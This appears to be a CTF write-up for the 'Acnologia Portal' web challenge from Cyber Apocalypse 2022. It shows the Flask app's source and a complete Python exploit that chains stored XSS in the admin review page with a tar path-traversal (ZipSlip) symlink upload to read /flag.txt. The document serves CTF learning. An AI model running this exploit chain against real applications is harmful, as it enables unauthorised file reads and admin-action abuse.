Skip to content

Latest commit

 

History

History
585 lines (435 loc) · 17.5 KB

2022-05-23-zipslip.md

File metadata and controls

585 lines (435 loc) · 17.5 KB
layout title subtitle cover-img thumbnail-img share-img tags
post
B-XSS -> ZipSlip -> Local File Read
ZipSlip
/assets/img/wsc.jpg
/assets/img/wsc.jpg
/assets/img/wsc.jpg
Web

Cyber Apocalypse CTF 2022 - Acnologia Portal

Acnologia Portal is a Web Chal in Cyber Apocalypse CTF 2022.

Website:

Hierarchy of the Application:

Intro:

This is a Typical XSS Web chal allow us to Create Account and Login and there is a Report functionality.

Report:

Source Code:

database.py [nothing special]

from flask_sqlalchemy import SQLAlchemy
from sqlalchemy_serializer import SerializerMixin
from flask_login import UserMixin
from flask import current_app

db = SQLAlchemy()

class User(db.Model, UserMixin):
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(100), unique=True)
    password = db.Column(db.String(100))

class Firmware(db.Model, UserMixin, SerializerMixin):
    id = db.Column(db.Integer, primary_key=True)
    module = db.Column(db.String(100))
    hw_version = db.Column(db.String(100))
    fw_version = db.Column(db.String(100))
    serial = db.Column(db.String(100))
    hub_id = db.Column(db.String(100))

class Report(db.Model, UserMixin, SerializerMixin):
    id = db.Column(db.Integer, primary_key=True)
    module_id = db.Column(db.Integer)
    reported_by = db.Column(db.String(100))
    issue = db.Column(db.Text)

def clear_reports():
    db.session.query(Report).delete()
    db.session.commit()

def clear_db():
    meta = db.metadata
    for table in reversed(meta.sorted_tables):
        db.session.execute(table.delete())
    db.session.commit()

def migrate_db():
    clear_db()
    # admin user
    db.session.add(User(id=1, username=current_app.config['ADMIN_USERNAME'], password=current_app.config['ADMIN_PASSWORD']))

    # firmwares
    db.session.add(Firmware(id=1, module='Launch pod interface', hw_version='d3', fw_version='2408.b', serial='c6c3b20e', hub_id='17310'))
    db.session.add(Firmware(id=2, module='Oxidizer controller', hw_version='a4', fw_version='1801.c', serial='b20418fc', hub_id='33194'))
    db.session.add(Firmware(id=3, module='Propellant damper', hw_version='b6', fw_version='1705.e', serial='7fdee87d', hub_id='19696'))
    db.session.add(Firmware(id=4, module='RD-983 compressor', hw_version='a1', fw_version='0002.a', serial='b0dae2e3', hub_id='91284'))
    db.session.add(Firmware(id=5, module='Refinery interface', hw_version='g4', fw_version='4323.d', serial='d0f2798d', hub_id='31157'))
    db.session.add(Firmware(id=6, module='Condensation chamber', hw_version='k3', fw_version='3467.p', serial='2e1e7897', hub_id='19850'))
    db.session.add(Firmware(id=7, module='Fission reactor', hw_version='p3', fw_version='9031.g', serial='9c431d03', hub_id='12488'))
    db.session.add(Firmware(id=8, module='Booster core', hw_version='i7', fw_version='7651.g', serial='cd003b79', hub_id='12488'))
    db.session.add(Firmware(id=9, module='Surface calibrator', hw_version='a1', fw_version='4632.g', serial='b320babd', hub_id='14274'))
    db.session.add(Firmware(id=10, module='Nozzle controller', hw_version='f6', fw_version='8731.g', serial='8be939d9', hub_id='78804'))

    db.session.commit()

routes.py

import json
from application.database import User, Firmware, Report, db, migrate_db
from application.util import is_admin, extract_firmware
from flask import Blueprint, jsonify, redirect, render_template, request
from flask_login import current_user, login_required, login_user, logout_user
from application.bot import visit_report

web = Blueprint('web', __name__)
api = Blueprint('api', __name__)

def response(message):
    return jsonify({'message': message})

@web.route('/', methods=['GET'])
def login():
    return render_template('login.html')

@api.route('/login', methods=['POST'])
def user_login():
    if not request.is_json:
        return response('Missing required parameters!'), 401

    data = request.get_json()
    username = data.get('username', '')
    password = data.get('password', '')

    if not username or not password:
        return response('Missing required parameters!'), 401

    user = User.query.filter_by(username=username).first()

    if not user or not user.password == password:
        return response('Invalid username or password!'), 403

    login_user(user)
    return response('User authenticated successfully!')

@web.route('/register', methods=['GET'])
def register():
    return render_template('register.html')

@api.route('/register', methods=['POST'])
def user_registration():
    if not request.is_json:
        return response('Missing required parameters!'), 401

    data = request.get_json()
    username = data.get('username', '')
    password = data.get('password', '')

    if not username or not password:
        return response('Missing required parameters!'), 401

    user = User.query.filter_by(username=username).first()

    if user:
        return response('User already exists!'), 401

    new_user = User(username=username, password=password)
    db.session.add(new_user)
    db.session.commit()

    return response('User registered successfully!')

@web.route('/dashboard')
@login_required
def dashboard():
    return render_template('dashboard.html')

@api.route('/firmware/list', methods=['GET'])
@login_required
def firmware_list():
    firmware_list = Firmware.query.all()
    return jsonify([row.to_dict() for row in firmware_list])

@api.route('/firmware/report', methods=['POST'])
@login_required
def report_issue():
    if not request.is_json:
        return response('Missing required parameters!'), 401

    data = request.get_json()
    module_id = data.get('module_id', '')
    issue = data.get('issue', '')

    if not module_id or not issue:
        return response('Missing required parameters!'), 401

    new_report = Report(module_id=module_id, issue=issue, reported_by=current_user.username)
    db.session.add(new_report)
    db.session.commit()

    visit_report()
    migrate_db()

    return response('Issue reported successfully!')

@api.route('/firmware/upload', methods=['POST'])
@login_required
@is_admin
def firmware_update():
    if 'file' not in request.files:
        return response('Missing required parameters!'), 401

    extraction = extract_firmware(request.files['file'])
    if extraction:
        return response('Firmware update initialized successfully.')

    return response('Something went wrong, please try again!'), 403

@web.route('/review', methods=['GET'])
@login_required
@is_admin
def review_report():
    Reports = Report.query.all()
    return render_template('review.html', reports=Reports)

@web.route('/logout')
@login_required
def logout():
    logout_user()
    return redirect('/')

Middleware Functions:

@login_required

  • login_required check if the user is authenticated

@is_admin

def is_admin(f):
    @functools.wraps(f)
    def wrap(*args, **kwargs):
        if current_user.username == current_app.config['ADMIN_USERNAME'] and request.remote_addr == '127.0.0.1':
            return f(*args, **kwargs)
        else:
            return abort(401)

    return wrap
  • is_admin check if the username is equal to the Admin Username and the IP Adress

Routes:

app.register_blueprint(web, url_prefix='/')
app.register_blueprint(api, url_prefix='/api')
  • web routes are not Interesting

Api Routes:

  • /api/register route to register user
@api.route('/register', methods=['POST'])
def user_registration():
    if not request.is_json:
        return response('Missing required parameters!'), 401

    data = request.get_json()
    username = data.get('username', '')
    password = data.get('password', '')

    if not username or not password:
        return response('Missing required parameters!'), 401

    user = User.query.filter_by(username=username).first()

    if user:
        return response('User already exists!'), 401

    new_user = User(username=username, password=password)
    db.session.add(new_user)
    db.session.commit()

    return response('User registered successfully!')

@web.route('/dashboard')
  • /api/login route to login
@api.route('/login', methods=['POST'])
def user_login():
    if not request.is_json:
        return response('Missing required parameters!'), 401

    data = request.get_json()
    username = data.get('username', '')
    password = data.get('password', '')

    if not username or not password:
        return response('Missing required parameters!'), 401

    user = User.query.filter_by(username=username).first()

    if not user or not user.password == password:
        return response('Invalid username or password!'), 403

    login_user(user)
    return response('User authenticated successfully!')
  • /api/firmware/report route to handle the Report from user and Save in the DB

  • visit_report() is a Function that trigger the Bot to View the Report.

  • migrate_db() is a Function which clear the clear the database (report column)

@api.route('/firmware/report', methods=['POST'])
@login_required
def report_issue():
    if not request.is_json:
        return response('Missing required parameters!'), 401

    data = request.get_json()
    module_id = data.get('module_id', '')
    issue = data.get('issue', '')

    if not module_id or not issue:
        return response('Missing required parameters!'), 401

    new_report = Report(module_id=module_id, issue=issue, reported_by=current_user.username)
    db.session.add(new_report)
    db.session.commit()

    visit_report()
    migrate_db()

    return response('Issue reported successfully!')
  • /api/firmware/upload route can handle file Uploads, we can Upload files to the Server via this route

  • @login_required and @is_admin is required. So only Admin can Upload files

@api.route('/firmware/upload', methods=['POST'])
@login_required
@is_admin
def firmware_update():
    if 'file' not in request.files:
        return response('Missing required parameters!'), 401

    extraction = extract_firmware(request.files['file'])
    if extraction:
        return response('Firmware update initialized successfully.')

    return response('Something went wrong, please try again!'), 403
  • extract_firmware() function is responsible to extract files
def extract_firmware(file):
    tmp  = tempfile.gettempdir()
    path = os.path.join(tmp, file.filename)
    file.save(path)

    if tarfile.is_tarfile(path):
        tar = tarfile.open(path, 'r:gz')
        tar.extractall(tmp)

        rand_dir = generate(15)
        extractdir = f"{current_app.config['UPLOAD_FOLDER']}/{rand_dir}"
        os.makedirs(extractdir, exist_ok=True)
        for tarinfo in tar:
            name = tarinfo.name
            if tarinfo.isreg():
                try:
                    filename = f'{extractdir}/{name}'
                    os.rename(os.path.join(tmp, name), filename)
                    continue
                except:
                    pass
            os.makedirs(f'{extractdir}/{name}', exist_ok=True)
        tar.close()
        return True

    return False
  • At First, the Uploaded files are stored in the /tmp and variable path hold the name of the file with path. like /tmp/myfile.tar.gz
tmp  = tempfile.gettempdir()
path = os.path.join(tmp, file.filename)
file.save(path)
  • The Below If condition checks if the Uploaded file is valid tar file. if True -> extract all files in /tmp dir
if tarfile.is_tarfile(path):
        tar = tarfile.open(path, 'r:gz')
        tar.extractall(tmp)
  • The Below for Loop check if the Extracted files are Normal files. The tarinfo.isreg() function Checks if the file is a normal file or a symlink file.

  • If the Extracted Files are Valid files, then the files are Moved to /app/application/static/firmware/[random_number]. We can access these files in /static dir where the static js, css, png are Stored, if We can Leak the [random_number], We can Read files Uploaded by Admin.

  • If the Extracted Files are not Valid Files, then the Files are Removed and Not moved to /static dir.

for tarinfo in tar:
            name = tarinfo.name
            if tarinfo.isreg():
                try:
                    filename = f'{extractdir}/{name}'
                    os.rename(os.path.join(tmp, name), filename)
                    continue
                except:
                    pass
            os.makedirs(f'{extractdir}/{name}', exist_ok=True)
        tar.close()

Web Route:

  • /review is a GET Route where the Reports are Rendered. Only Admin user can view this Route.
@web.route('/review', methods=['GET'])
@login_required
@is_admin
def review_report():
    Reports = Report.query.all()
    return render_template('review.html', reports=Reports)

Review.html

  • In Review.html, The User Input is Not Sanitized Before passed, So we Have a XSS here!
 <div class="card-header"> Reported by : USER
        </div>
        <div class="card-body">
        <p class="card-title">Module ID : {{ report.module_id }}</p>
          <p class="card-text">Issue : {{ report.issue | safe }} </p>
          <a href="#" class="btn btn-primary">Reply</a>
          <a href="#" class="btn btn-danger">Delete</a>
        </div>

Exploit Idea:

  • Now, We have a XSS, Cookies are Set to HTTP Only, So, we cannot get the Admin Bot Cookie and Also is_admin() function checks if the ip is '127.0.0.1' or Not.

  • Now, with Blind XSS, we need to craft a Payload to Send a tar file to /api/firmware/upload.

  • There is a WellKnown Vulnerability ZipSlip which allow us to pack files into tar or zip files, which are path traversaled when the zip file is unziped.

  • Creating a symlink file that pointing to /flag.txt and using zipslip Vulnerability to traversal the Extracted Files.

  • We can traversal the symlink file to /app/applicaition/static/getflag.txt while unziping the tar file. [getflag.txt is a symlink file pointing to /flag.txt]

  • By traversaling the Extracted files to /app/applicaition/static will help to bypass the tarinfo.isreg() function. Bcoz, this function checks the files present in /tmp dir where the normal files are initially Extracted.

Exploit:

  • I wrote a Python Script to Automate this.
import requests
import os
import random
import string
import tarfile

letters = string.ascii_lowercase
randomText=  ''.join(random.choice(letters) for i in range(10)) 
url = 'http://localhost:1337'

def registerUser(username, password):
    r = requests.post(url + '/api/register', json={"username":username,"password":password})
    if r.status_code != 200:
        print(r.text)
        exit()  

def loginUser(username, password):
    r = requests.post(url + '/api/login', json={"username":username,"password":password})
    if r.status_code != 200:
        print(r.text)
        exit()    
    
    session = r.headers['Set-Cookie'].split(';')[0].split('=')[1]
    global cookies
    cookies = {
        'session':session
    }
    r = requests.get(url + '/dashboard', cookies=cookies)

def makeTar():
    os.system(f'mkdir ../app')
    os.system(f'mkdir ../app/application/')
    os.system(f'mkdir ../app/application/static')
    os.system('ln -s /flag.txt getflag.txt; mv getflag.txt ../app/application/static/')
    
    tar = tarfile.open('exp.tar','w')
    tar.add('../app/application/static/getflag.txt')
    tar.close()

    os.system('gzip exp.tar')
    os.system('rm -rf ../app')
    
def js():   
    string = os.popen('cat exp.tar.gz | base64 -w0')
    os.system('rm -rf exp.tar.gz')
    b64String = string.read()
    global js 
    js = """
        <script>
        function base64toBlob(base64Data, contentType) {
        contentType = contentType || '';
        var sliceSize = 1024;
        var byteCharacters = atob(base64Data);
        var bytesLength = byteCharacters.length;
        var slicesCount = Math.ceil(bytesLength / sliceSize);
        var byteArrays = new Array(slicesCount);

        for (var sliceIndex = 0; sliceIndex < slicesCount; ++sliceIndex) {
            var begin = sliceIndex * sliceSize;
            var end = Math.min(begin + sliceSize, bytesLength);

            var bytes = new Array(end - begin);
            for (var offset = begin, i = 0; offset < end; ++i, ++offset) {
                bytes[i] = byteCharacters[offset].charCodeAt(0);
            }
            byteArrays[sliceIndex] = new Uint8Array(bytes);
        }
        return new Blob(byteArrays, { type: contentType });
    }

    var b64file = """+f"'{b64String}'"+""";

    var content_type = 'application/x-gtar-compressed';
    var blob = base64toBlob(b64file, content_type);

    var formData = new FormData();
    formData.append('file', blob,'abcd');

    var url = 'http://localhost:1337/api/firmware/upload';
    var request = new XMLHttpRequest();
    request.withCredentials = true;
    request.open('POST', url);
    request.send(formData);
    </script>
    """

def report():
    r = requests.post(url + '/api/firmware/report', cookies=cookies, json={"module_id": "1", "issue": f"{js}"})
    if r.status_code != 200:
        print(r.text)
        exit()

def getflag():
    r = requests.get(url+'/static/getflag.txt')
    print(r.text.strip())
    exit()

def main():
    registerUser(randomText,randomText)
    loginUser(randomText, randomText)
    makeTar()
    js()
    report()
    getflag()

if __name__ == "__main__":
    main()

FLAG : HTB{des3r1aliz3_4ll_th3_th1ngs}